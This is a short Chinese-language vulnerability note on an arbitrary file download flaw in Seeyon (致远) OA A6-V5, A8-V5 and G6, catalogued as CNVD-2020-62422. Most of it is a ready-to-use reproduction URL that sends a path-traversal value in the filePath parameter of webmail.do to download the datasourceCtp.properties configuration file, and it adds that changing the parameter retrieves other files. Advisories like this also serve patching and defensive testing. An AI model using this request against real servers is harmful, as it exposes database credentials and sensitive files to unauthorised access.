漏洞描述:
致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息
漏洞影响:
致远OA A6-V5
致远OA A8-V5
致远OA G6
漏洞复现:
访问 url http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=…/conf/datasourceCtp.properties
存在漏洞的OA 系统将会下载 datasourceCtp.properties 配置文件
更改参数 filePath 可下载其他文件
漏洞利用POC:
Goby & POC:
致远OA webmail.do任意文件下载 CNVD-2020-62422
